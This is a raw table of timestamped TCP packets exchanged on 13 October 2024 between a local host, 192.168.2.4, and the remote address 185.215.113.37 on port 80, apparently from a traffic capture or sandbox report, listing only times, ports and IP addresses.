Oct 13, 2024 17:46:17.054423094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054434061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054442883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.054444075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054444075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054482937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.054482937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.156014919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.160840034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376262903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376279116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376291037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376306057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376316071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376333952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376394033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376416922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376430035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376440048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376441956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376455069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376485109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376485109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376533985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376543999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376586914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376595974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376606941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376606941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376620054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376646042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376660109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376660109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376703024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376703978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376734018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376745939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376765013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376775980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376785994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376797915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376807928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376807928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376816034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376826048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376837969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376852036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376857996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376857996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376863003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376878977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376888990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376899004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376908064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376908064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376910925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376965046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376966000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376966000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.376976967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.376988888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377001047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377008915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377049923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377049923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377090931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377101898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377113104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377124071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377135992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377146006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377146006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377181053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377191067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377191067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377192020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377204895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377217054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377227068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377238989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377243042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377243042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377280951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377464056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377476931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377486944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377505064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377521992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377532959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377545118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377547026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377554893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377557039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377576113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377580881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377588034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377620935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377633095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377635956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377635956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377645016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377656937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377686024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377686024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377690077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377702951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377713919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377713919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377727032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377738953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377751112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377763033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377777100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377777100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377830982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377863884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377876997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377888918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377906084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377918005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377929926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.377934933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377934933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.377995014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378079891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378093004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378104925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378114939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378118992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378134012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378145933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378158092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378180027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378185034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378197908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378207922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378210068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378210068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378220081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378237009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378243923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378249884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378262997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378281116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378283024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378293991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378305912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378317118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378328085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378328085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378328085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378369093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378401995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378415108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378427029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378437996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378453970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378453970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378488064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378509045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378520012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378530979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378541946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378545046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378545046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378555059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378573895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378585100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378585100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378597021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378608942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378621101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378629923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378629923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378633022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378659010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378670931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378690958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378693104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378693104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378701925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378726006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378736019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378751040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378767967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378779888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378791094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378824949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378824949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378922939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378935099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378946066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378956079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378967047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378978968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378990889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.378990889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.378990889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.379021883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.379033089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.379036903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.379036903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.379044056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.379056931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.379069090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.379076004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.379121065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.379133940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.379173994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467001915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467133045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467144012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467161894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467174053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467189074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467200041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467211008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467221975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467237949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467248917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467258930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467262030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467262030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467262030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467262030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467278957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467288971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467294931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467302084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467314005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467324972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467335939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467346907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467356920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467359066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467359066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467370033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467380047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467411995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467412949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467412949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467423916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467427015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467437029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467448950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467483044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467492104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467492104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467494011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467546940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467546940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467643023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467654943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467664957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467677116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467686892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467695951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467708111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467719078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467732906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467732906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467766047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467777014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467787981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467798948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467809916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467816114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467816114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467823982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467833042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467835903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467849016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467859030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467880964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467880964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467940092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467957973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.467984915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.467997074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468027115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468027115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468056917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468074083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468089104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468101025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468111038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468120098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468128920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468137980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468151093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468159914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468173027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468184948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468184948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468193054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468204975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468218088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468218088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468254089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468261957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468261957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468298912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468311071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468322039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468327999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468349934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468352079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468388081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468398094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468415022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468425989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468476057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468476057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468504906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468516111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468525887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468535900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468571901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468576908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468576908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468585968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468596935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468609095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468617916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468627930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468636036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468640089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468666077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468710899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468710899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468723059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.468756914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.468756914 CEST	49730	80	192.168.2.4	185.215.113.37
